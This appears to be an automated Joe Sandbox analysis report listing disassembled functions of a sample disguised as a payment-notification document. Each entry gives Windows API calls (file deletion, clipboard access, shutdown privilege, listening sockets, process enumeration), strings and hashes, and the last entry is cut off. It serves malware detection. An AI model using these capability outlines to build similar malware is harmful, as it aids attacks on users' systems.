API String ID: 1409584000-438819550
Opcode ID: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
Instruction ID: 61c15a592e8d60cc891b812a3733ed554f0df105fecf5787d3edd42ab2b228c2
Opcode Fuzzy Hash: 4a11ba880ceeab6e14cbd301e1e14c73f4c2072deba920c9b76d2059c49faf74
Instruction Fuzzy Hash: 3D311772505209AEEF10EFB5EC08ADE37AC9F49321F14405AFC18E2190DB30DE888F60

Function 0095979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 009597BE
FindNextFileW.KERNEL32(00000000,?), ref: 00959819
FindClose.KERNEL32(00000000), ref: 00959824
FindFirstFileW.KERNEL32(*.*,?), ref: 00959840
SetCurrentDirectoryW.KERNEL32(?), ref: 00959890
SetCurrentDirectoryW.KERNEL32(009A6B7C), ref: 009598AE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009598B8
FindClose.KERNEL32(00000000), ref: 009598C5
FindClose.KERNEL32(00000000), ref: 009598D5

Part of subcall function 0094DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0094DB00

Strings

*.*, xrefs: 0095983B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
Instruction ID: 1257e51883a36b248935a73b589cce0ecf9f4c96ab5c2d0f26f4b80fb805df6b
Opcode Fuzzy Hash: 69c100de46831065ee1dd4dbfc851c83c3b52820cdc99ae6dab96377552da277
Instruction Fuzzy Hash: 7131F272505219AEEF10EFB5EC48ADE37ACDF46325F144169ED18A21D0DB30DA88DB60

Function 00958195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00958257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00958267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00958273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00958310
SetCurrentDirectoryW.KERNEL32(?), ref: 00958324
SetCurrentDirectoryW.KERNEL32(?), ref: 00958356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0095838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00958395

Strings

*.*, xrefs: 0095839B

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
Instruction ID: fe86fd0136d3b3caff69ae62a39e36bc13888ff4eec0f2cffc49f6b1955d1b1c
Opcode Fuzzy Hash: 1e9ab27cd19499a8f7d36c51596e3c1b3ba4de8462100ac1212b351b242c967e
Instruction Fuzzy Hash: 166148B25082459FCB10EF65C841AAFB3E8FF89311F04891DF999D7251EB31E949CB92

Function 0094D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2

Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A

FindFirstFileW.KERNEL32(?,?), ref: 0094D122
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0094D1DD
MoveFileW.KERNEL32(?,?), ref: 0094D1F0
DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D20D
FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D237

Part of subcall function 0094D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0094D21C,?,?), ref: 0094D2B2

FindClose.KERNEL32(00000000,?,?,?), ref: 0094D253
FindClose.KERNEL32(00000000), ref: 0094D264

Strings

\*.*, xrefs: 0094D0CD, 0094D0D6, 0094D0EB

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 5ab43182f92672787c8cd8aaa9451014589af4e3cdc2279721a21783194681c5
Instruction ID: 9aa138841782d6cb4f6b09ad55bbc5772ccfb941b4e7981522fe7390f99076ba
Opcode Fuzzy Hash: 5ab43182f92672787c8cd8aaa9451014589af4e3cdc2279721a21783194681c5
Instruction Fuzzy Hash: 32619C3180614DABCF15EBA5C992DEDB7B9FF56300F204069E411B31A2EB70AF49CB61

Function 0095ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0095ED91
EmptyClipboard.USER32 ref: 0095ED97
GlobalAlloc.KERNEL32(00000002,?), ref: 0095EDAC
CloseClipboard.USER32 ref: 0095EEA3

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
Instruction ID: 8ae45932bf481318f40f3bb625d5550797d6e12853f80dbf6385ffd365c7a9c9
Opcode Fuzzy Hash: aacf6deba15a5b30fdd8c52b3558541093cae9b705c7373c21443b420df9767e
Instruction Fuzzy Hash: 694103716182119FD714CF16D889F19BBE4FF44319F04C09DE8298B6A2C736ED85CB80

Function 0094E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
Part of subcall function 009416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
Part of subcall function 009416C3: GetLastError.KERNEL32 ref: 0094174A

ExitWindowsEx.USER32(?,00000000), ref: 0094E932

Strings

, xrefs: 0094E920
SeShutdownPrivilege, xrefs: 0094E902
, xrefs: 0094E95C
@, xrefs: 0094E925

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
Instruction ID: d274e782141dea60f94e6ab9bbc07305002e33046d14ea4f7fa461e5ed0b6a96
Opcode Fuzzy Hash: 37a5fa49a39067a84a019308bcc40217d961dd0f2e453919aec29da63e77f413
Instruction Fuzzy Hash: A401F973725211AFEB6426B49C86FBF729CB754790F150825FC13E21D2D6A59C809294

Function 00961204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00961276
WSAGetLastError.WSOCK32 ref: 00961283
bind.WSOCK32(00000000,?,00000010), ref: 009612BA
WSAGetLastError.WSOCK32 ref: 009612C5
closesocket.WSOCK32(00000000), ref: 009612F4
listen.WSOCK32(00000000,00000005), ref: 00961303
WSAGetLastError.WSOCK32 ref: 0096130D
closesocket.WSOCK32(00000000), ref: 0096133C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
Instruction ID: d2a99820dc33a1f673082c0d6aa6f471ecb61fa5986a9fabbc31465667e22e4d
Opcode Fuzzy Hash: b12829c498e3538a79b44b8017fe7534bb676cbdc800ceefb7c4e0c319a025c4
Instruction Fuzzy Hash: 7C417F71A001409FD710DF68C498B6ABBE5BF46318F1C819CE8669F296C771ED81CBA1

Function 0094D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008E3A97,?,?,008E2E7F,?,?,?,00000000), ref: 008E3AC2

Part of subcall function 0094E199: GetFileAttributesW.KERNEL32(?,0094CF95), ref: 0094E19A

FindFirstFileW.KERNEL32(?,?), ref: 0094D420
DeleteFileW.KERNEL32(?,?,?,?), ref: 0094D470
FindNextFileW.KERNEL32(00000000,00000010), ref: 0094D481
FindClose.KERNEL32(00000000), ref: 0094D498
FindClose.KERNEL32(00000000), ref: 0094D4A1

Strings

\*.*, xrefs: 0094D3F2

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
Instruction ID: 50434544baeb9c51cf99fe93bc52002787ac491f0ae9e212c3912401189d3442
Opcode Fuzzy Hash: 8b68771a663716ac8379183ec6e74ac8d4b1bbb865c36ed3ad9beed541ae9dd5
Instruction Fuzzy Hash: 68316F7101D3819BC204EF69D8958AF77ACFE92304F444A2DF4E5931A1EB20EA49D763

Function 0091E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0091E645

Strings

1#QNAN, xrefs: 0091F84B
1#SNAN, xrefs: 0091F844
1#INF, xrefs: 0091F852
1#IND, xrefs: 0091F83D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
Instruction ID: 27b16bb383390d24e718a71fc6f18111578f19e1709c111dc521114cffeca59a
Opcode Fuzzy Hash: 52634eb38c5af51f9258e7b83eea693aabd35235f378026fe9e18d24a81014dd
Instruction Fuzzy Hash: 7EC22C71E0862D8FDB25CE289D547E9B7B9EB44344F1445EAD84EE7280E778AEC18F40

Function 0095648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009564DC
CoInitialize.OLE32(00000000), ref: 00956639
CoCreateInstance.OLE32(0097FCF8,00000000,00000001,0097FB68,?), ref: 00956650
CoUninitialize.OLE32 ref: 009568D4

Strings

.lnk, xrefs: 009564BA, 00956524, 009565E0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: bbe27fd6644057dc0ebd5d94546156e7e10b4d5b3c114a732d039d12bfb03940
Instruction ID: 397ed81502e97f2b979c4233448752e423a5a47b29b6bc724da891ca3d410133
Opcode Fuzzy Hash: bbe27fd6644057dc0ebd5d94546156e7e10b4d5b3c114a732d039d12bfb03940
Instruction Fuzzy Hash: 1FD159715082419FC314EF29C881A6BB7E8FF95704F50496DF595CB2A1EB70EE0ACB92

Function 009622DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009622E8

Part of subcall function 0095E4EC: GetWindowRect.USER32(?,?), ref: 0095E504

GetDesktopWindow.USER32 ref: 00962312
GetWindowRect.USER32(00000000), ref: 00962319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00962355
GetCursorPos.USER32(?), ref: 00962381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009623DF

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
Instruction ID: 9771fcf244d5be404067d9ed49e834b52b4d78e5005956b0d14617662f77cf31
Opcode Fuzzy Hash: 41de01becf0434a2da198f91d3f80c3392b540d80be81f40f0c3d03adf9b7693
Instruction Fuzzy Hash: 1E31EE72509715AFC720DF54C849F9BBBA9FF88710F000A1DF98997291DB35EA48CB92

Function 00959B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00959B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00959C8B

Part of subcall function 00953874: GetInputState.USER32 ref: 009538CB
Part of subcall function 00953874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00953966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00959BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00959C75

Strings

*.*, xrefs: 00959B5D

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 9a2e0c08b80bd652473f935b281d304dcfb07facce52f5348ecdd65b50f1eaa1
Instruction ID: da41799bfb3761c644eb4cc00647eccc42db7be7fe6a5127264690f42e931ae1
Opcode Fuzzy Hash: 9a2e0c08b80bd652473f935b281d304dcfb07facce52f5348ecdd65b50f1eaa1
Instruction Fuzzy Hash: D5416171904209EFDF14DF69D845AEE7BB8FF45311F244055E859A2191EB309E88CF61

Function 008F997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 008F9A4E
GetSysColor.USER32(0000000F), ref: 008F9B23
SetBkColor.GDI32(?,00000000), ref: 008F9B36

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
Instruction ID: 185dcce16e73c945b18d357ce0ed348f1656c8f42806b889ff3ae6678cf2ad94
Opcode Fuzzy Hash: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
Instruction Fuzzy Hash: CDA17EB120846CBEE738AA7C8C99F7B769DFB82314F10420AF692C65D1CA259D01D772

Function 00961806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0096304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0096307A
Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0096185D
WSAGetLastError.WSOCK32 ref: 00961884
bind.WSOCK32(00000000,?,00000010), ref: 009618DB
WSAGetLastError.WSOCK32 ref: 009618E6
closesocket.WSOCK32(00000000), ref: 00961915

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
Instruction ID: d576f579b0559731347e49a84c047e6a268ca066fcebb58b433076656211d455
Opcode Fuzzy Hash: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
Instruction Fuzzy Hash: 7351B471A002109FD710AF28D886F6A77E5EB45718F08845CF9159F3D3D771AD418BA2

Function 00971C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00971CC0
IsWindowEnabled.USER32 ref: 00971CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00971CDB
IsIconic.USER32 ref: 00971CE9
IsZoomed.USER32 ref: 00971CF7

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
Instruction ID: 1099ca8f3b023b9deb96a187eb01e3907d5c33e0b4197ea5089b15127acedff7
Opcode Fuzzy Hash: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
Instruction Fuzzy Hash: 3121A0327402015FD7218F5EC884B2A7BA9EF85314B1DC05CE88E8B251CB71EC42CB90

Function 008E8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00925DF0
VUUU, xrefs: 008E83E8
VUUU, xrefs: 008E83FA
VUUU, xrefs: 008E843C
ERCP, xrefs: 008E813C

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
Instruction ID: d19d6072b94765976761d67efeb42b7dd0171dfa60d026fcc80dc0e985ab7338
Opcode Fuzzy Hash: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
Instruction Fuzzy Hash: 92A28E70A0066ACBDF24CF59D8407ADB7B1FF55314F2585AAE819E7688EB309D81CF90

Function 0096A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0096A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0096A6BA

Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD

Process32NextW.KERNEL32(00000000,?), ref: 0096A79C
CloseHandle.KERNEL32(00000000), ref: 0096A7AB

Part of subcall function 008FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00923303,?), ref: 008FCE8A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
